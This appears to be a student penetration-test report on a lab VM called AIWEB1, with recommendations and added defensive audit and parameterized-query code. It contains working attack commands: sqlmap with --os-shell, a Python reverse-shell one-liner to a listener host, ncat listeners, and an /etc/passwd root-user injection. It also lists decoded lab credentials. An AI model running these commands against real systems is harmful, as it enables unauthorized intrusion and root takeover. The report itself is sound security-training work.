Task-1 (PT)

Uploaded by sai778x

PENETRATION TESTING

Alpha ..
Table of Contents

FINDINGS OVERVIEW ................................................ 4
RECOMMENDATIONS .................................................. 4
SEVERITY SCALE ................................................... 5
INFORMATION GATHERING ............................................ 7
ENUMERATION ...................................................... 7
VULNERABILITY ASSESSMENT ........................................ 14
EXPLOITATION .................................................... 20
    Further enumeration of the AIWEB1 MySQL database ............ 20
    Enumerating TABLE data ...................................... 20
    Dumping data for TABLE ‘user’ ............................... 20
OTHER ISSUES .................................................... 33

FINDINGS OVERVIEW
While conducting the external penetration test, several critical
vulnerabilities were discovered in the AI-Web network. The tester was able to
gain full administrative privilege on the AIWEB1 corporate server. This was
possible due to a vulnerable web application, which led to remote system
access; full administrative control was then gained through improperly set
permissions on a critical system file. A brief technical overview is listed
below:

o Target: AIWEB1 – Low-privilege shell was obtained by performing a
SQL Injection attack against AI-Web’s web app ‘se3reTdir777’ found
at URL: http://10.10.10.4/se3reTdir777/ , granting access as the
HTTP service account ‘www-data’. Once access was established,
privilege escalation was possible due to the write permissions of
‘www-data’, allowing the creation of a new administrative user (‘user1’)
in the ‘/etc/passwd’ file, after which the tester could issue the command
‘su user1’ and provide the password ‘password’, giving them full
root access.

RECOMMENDATIONS

o Implement Prepared Statements with Parameterized Queries.
Injection attacks remain the most common attacks leveraged against
web applications. One of the most effective mitigation strategies for
preventing SQL Injection attacks is the implementation of Prepared
Statements with Parameterized Queries.

o Implement User Input Whitelisting. Another very useful mitigation
against SQL Injection attacks is to validate the supplied user input. One
should never trust that user input is safe; it should therefore be
checked for a set of disallowed characters.
o Require Secure Coding Training for Developers. Developers are
on the front lines of security for any organization and should be
prepared to be the first line of defense. Training in secure coding
techniques and practices will help ensure that your organization’s
applications are developed using the most secure code possible,
thus reducing your attack-surface and lowering your overall risk.

o Implement Network Security Devices. Putting up a few fences can
go a long way to increasing your security posture and is a key piece
of the Defense-in-Depth puzzle. By adding a Web Application
Firewall (WAF), Next-Gen Firewall, and/or Intrusion
Detection/Prevention System, you can significantly increase your
ability to stop intruders from accessing your systems.

o Perform Permissions Audit of System Files. Permissions
misconfigurations are a common occurrence and can be leveraged to
gain full administrative privileges. Performing a baseline and then scheduled
audits of the permissions on system files can ensure those files and
their permissions follow security best practices. Service
accounts should not be owners of sensitive operating system files
that control local user accounts.
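A small audit for the ‘/etc/passwd’ misconfiguration described in this report, added here as an example and not taken from the report: it checks the file’s owner and mode as the recommendation above asks, and parses the entries for the two signs that a service account has appended its own login (an extra UID-0 account, and a password hash stored in passwd rather than in shadow). The sample passwd text and its hash placeholder are constructed.

```python
import os
import stat

# Constructed sample passwd content; the hash is a placeholder, not a
# real credential. The third entry mirrors the pattern found on AIWEB1.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
user1:$6$SALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""


def permission_findings(st_mode, st_uid):
    """Findings for a file's mode and owner uid as os.stat reports them.
    /etc/passwd must be owned by root and writable only by its owner."""
    findings = []
    if st_uid != 0:
        findings.append(f"owned by uid {st_uid}, expected root (0)")
    if st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def account_findings(passwd_text):
    """Findings from the passwd entries themselves."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"malformed entry: {line}")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"extra UID-0 account: {name}")
        # 'x' means the hash lives in /etc/shadow; '*', '!' and '' are locked
        # or passwordless markers. Anything else is a hash placed in passwd.
        if pw not in ("x", "*", "!", ""):
            findings.append(f"password hash stored in passwd for: {name}")
    return findings


def audit_passwd(path="/etc/passwd"):
    """Live check of a real file, combining both kinds of finding."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return permission_findings(st.st_mode, st.st_uid) + account_findings(text)
```

Run `audit_passwd()` on a host to get a list of findings; an empty list means the file is root-owned, not group/world-writable, and contains no appended root-equivalent entries.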

SEVERITY SCALE

CRITICAL Severity Issue: Poses immediate danger to systems, network,
and/or data security and should be addressed as soon as possible.
Exploitation requires little to no special knowledge of the target. Exploitation
doesn’t require highly advanced skill, training, or tools.

HIGH Severity Issue: Poses significant danger to systems, network, and/or
data security. Exploitation commonly requires some advanced knowledge,
training, skill, and/or tools. Issue(s) should be addressed promptly.

MEDIUM Severity Issue: Vulnerabilities should be addressed in a timely
manner. Exploitation is usually more difficult to achieve and requires
special knowledge or access. Exploitation may also require social
engineering as well as special conditions.

LOW Severity Issue: Danger of exploitation is unlikely as vulnerabilities offer
little to no opportunity to compromise system, network, and/or data security.
Can be handled as time permits.

INFORMATIONAL Issue: Meant to increase client’s knowledge. Likely no actual
threat.

INFORMATION GATHERING

The tester was given a scope of host(s) from AI-Web that includes the AI-Web
corporate server. The network details of that device are listed below:

- Hostname: AIWEB1
- IP Address: 10.10.10.4
- MAC Address: 00:0C:29:87:86:E3

The tester was able to verify the IP address and connectivity of the AIWEB1
host/server by connecting to the AI-Web network and performing a ping sweep of
the network, which returned the IP address 10.10.10.4 for AIWEB1.

ENUMERATION

The tester performed service enumeration to discover information about the
services provided by AIWEB1 that may reveal critical details that could be
leveraged to bypass security and gain an initial foothold into the system.

The tester began by scanning all ports on AIWEB1 with Nmap to determine which
services were open. *In some cases, some ports may not be listed.

The initial Nmap scan discovered that only TCP port 80 is open on target
AIWEB1. The tester then performed a more focused Nmap scan to gather more
detailed information.

The detailed Nmap scan revealed that a ‘robots.txt’ file is being used to
hide 2 directories from search engine crawlers. Manually browsing this
file verifies the finding.

Further enumeration, both automated and manual, revealed more sensitive
data that proved to be crucial to gaining database and system access.

Directory fuzzing results of the ‘/m3diNf0/’ web directory using GoBuster.

Directory fuzzing revealed nothing immediately useful in the
‘/se3reTdir777/uploads/’ web directory.

Directory fuzzing results of the ‘/se3reTdir777/’ web directory using GoBuster.

The tester was then able to browse to these web pages to gain more information.

http://10.10.10.4/m3diNf0/info.php

http://10.10.10.4/se3reTdir777/index.php

VULNERABILITY ASSESSMENT

The vulnerability assessment is done in an attempt to verify that a
vulnerability exists that may be exploitable by an attacker. It was at this time
that the tester employed a variety of web application vulnerability scanners,
such as Skipfish and SQLMap, which were successful at discovering an
exploitable vulnerability (SQL Injection). This vulnerability was then
leveraged by the tester to gain initial system access.

Vulnerability Exploited: SQL Injection

Vulnerability Explanation: SQL injection attacks occur when a web
application does not perform any validation of the values received from
objects like web forms, user input parameters, cookies, etc., before passing
them to SQL queries that are to be executed on a database server. This gives
an attacker a way to manipulate the input so that the data is interpreted as
part of the code instead of as user-supplied data.

Vulnerability Mitigation: Implement Prepared Statements with
Parameterized Queries.

o OWASP Parameterization Cheat Sheet
o OWASP SQL Injection Prevention Cheat Sheet
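The two mitigations recommended in this report (parameterized queries and input validation) applied to the kind of ‘uid’ lookup behind this finding, as an added example that is not code from the AI-Web application or from the report. The table, column names and rows are constructed, and sqlite3 stands in for the MySQL backend; the probe value 1'" is the one shown in the Skipfish trace.

```python
import re
import sqlite3

# Constructed stand-in for the AIWEB1 MySQL 'user' table; the column names
# are assumptions, not taken from the target.
_DB = sqlite3.connect(":memory:")
_DB.execute("CREATE TABLE user (id INTEGER, name TEXT, email TEXT)")
_DB.executemany("INSERT INTO user VALUES (?, ?, ?)",
                [(1, "alice", "alice@example.test"),
                 (2, "bob", "bob@example.test")])


def lookup_vulnerable(uid):
    """String concatenation: the uid value becomes part of the SQL text.
    A probe such as 1'" breaks the statement, and the resulting database
    error is what Skipfish reported for the 'uid' parameter."""
    query = f"SELECT id, name, email FROM user WHERE id = '{uid}'"
    return _DB.execute(query).fetchall()


def lookup_parameterized(uid):
    """Prepared statement: SQL text and value travel separately, so the
    value is never parsed as SQL. The same probe matches no row instead
    of raising an error."""
    query = "SELECT id, name, email FROM user WHERE id = ?"
    return _DB.execute(query, (uid,)).fetchall()


def validate_uid(uid):
    """Allowlist check: uid is a numeric identifier, so anything other than
    1-10 ASCII digits is rejected before it reaches the database."""
    if not re.fullmatch(r"[0-9]{1,10}", uid):
        raise ValueError(f"rejected uid value: {uid!r}")
    return int(uid)


def lookup_hardened(uid):
    """Both mitigations layered: validate first, then parameterize."""
    return lookup_parameterized(validate_uid(uid))


def probe_raises_db_error(probe):
    """True when the concatenated query fails with a database error for the
    probe: the error-based injection signature seen in the Skipfish trace."""
    try:
        lookup_vulnerable(probe)
        return False
    except sqlite3.OperationalError:
        return True
```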

Severity: CRITICAL

Vulnerability Assessment Steps:

The tester scanned for security vulnerabilities by first utilizing the web app
vulnerability scanning tool Skipfish.

root@kali:~/# skipfish -o ./skipfish_report_aiweb1_se3reTdir777 http://10.10.10.4/se3reTdir777/

The results are saved in the given directory path and can then be viewed by
opening the generated ‘index.html’ with a web browser of choice.

To see more detail about the issues presented, click on the issue then click
on the ‘[ show trace + ]’ link.

From here we can see the data passed by Skipfish to the AIWEB1 web
application as well as the response sent back, which indicates vulnerability to
Error-Based SQL Injection attacks.

The Skipfish trace report shows that the scanner sent a request of
uid=1'"&Operation=Submit and the server returned a SQL syntax
error pointing to where the error might have occurred.

It was at this point that the tester manually confirmed the vulnerability.

The vulnerability scanner SQLMap was also used to verify the discovered SQL
Injection vulnerability and enumerate the database name.

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --data="uid=1&Operation=Submit" --dbs

The tester is now ready to move on to the next phase of testing.

EXPLOITATION

In the Exploitation phase, the tester will attempt to exploit found
vulnerabilities within your operating system, applications, and data. The end
goal for the tester is to penetrate the target environment, gaining as much
privilege as possible, and avoiding detection while doing so.

All activity will stay within the scope that was determined during
pre-engagement activities and documentation.

Gaining Low-Privilege Shell

The tester succeeded in gaining Remote Code Execution (RCE) by leveraging
the discovered SQL Injection vulnerability, chaining together SQLMap, Linux
Bash commands, and Python commands.

The tester began exploitation by further enumeration of the AIWEB1 MySQL
database.

Enumerating TABLE data:

Dumping data for TABLE ‘user’:

Dumping data for TABLE ‘systemUser’:

3 user accounts are discovered with Base64-encoded passwords. The
passwords are decoded, and the credentials are recorded.

1. t00r : FakeUserPassw0rd
2. aiweb1pwn : MyEvilPass_f908sdaf9_sadfasf0sa
3. u3er : N0tThis0neAls0

Low-Privilege Shell Access via SQLMap:

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --data="uid=1&Operation=Submit" --os-shell

The tester has now verified RCE on AIWEB1 and will attempt to obtain a
fully interactive TTY shell. This is desired for 2 reasons:

1. The SQLMap shell doesn’t always return command output consistently.
2. The SQLMap shell doesn’t work well with commands like cd, sudo, su,
etc.

The tester took the following steps to reach this goal.

The tester then checked whether Python was installed:

The tester started a listener with Netcat on the Kali Linux system to catch
the incoming connection:

root@kali:~# ncat -vnlp 9999

Using the SQLMap shell and Python, the tester then executed a new shell
connection from AIWEB1 to the tester’s Kali Linux Netcat listener:

os-shell> python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.10.10.3',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

The connection is successfully made to Kali from AIWEB1. The new shell is
much more stable and consistent, but still isn’t a fully interactive TTY shell.
To obtain the desired TTY, one more shell connection will need to be made.

In a new terminal session, the tester started another Netcat listener on TCP
port 8888 on the Kali Linux system…

root@kali:~# ncat -vnlp 8888

…and issued the following Bash one-liner from the previous Python shell
terminal session:

The connection is successfully made to the new terminal session, and Python is
used to create a fully interactive TTY shell:

Now that a fully interactive TTY shell session had been established, the
tester began the process of looking for a way to elevate privileges. Through
manual exploration of system files, a vulnerability was discovered that
allowed the tester to gain full administrative/root privileges on the AIWEB1
server.

Gaining full root access:

After checking file permissions for many common system files, the tester
quickly discovered a permissions misconfiguration on the ‘/etc/passwd’ file.

Since the tester had gained access through the ‘www-data’ service account,
they found themselves with ownership of and write permissions to the
‘/etc/passwd’ file. This allowed them to create a new user account entry
with root privileges and a password of their choice.

This was accomplished using the following steps.

From a terminal in Kali, the tester created a SHA-512 hashed password of
‘password’:

From a terminal in Kali, the tester then created a text file containing the
required fields for a user account entry in a standard /etc/passwd file.

This file (user1.passwd) contains all the information needed to log in as
‘user1’ with the password ‘password’.

From a terminal in Kali, the tester used Python to serve the user1.passwd file
over HTTP.

From the shell connection to AIWEB1, the tester downloaded the ‘user1.passwd’
file using the ‘curl’ command, saving the file to the ‘/tmp’ directory of
AIWEB1.

The tester was then able to append the contents of the ‘user1.passwd’ file to
the ‘/etc/passwd’ file.

At this point, the tester was able to log in with the ‘user1’ account and was
granted root privileges on the AIWEB1 server.

The tester then used their root privileges to access privileged files that
contain sensitive data. These were the ‘/root/flag.txt’ and ‘/etc/shadow’
files.

OTHER ISSUES

The tester was able to log in with the ‘aiweb1pwn’ account password discovered
in the enumeration of the MySQL database.

Severity: LOW

The tester discovered login credentials for the MySQL database which allowed a
successful local login to said database.

Severity: LOW
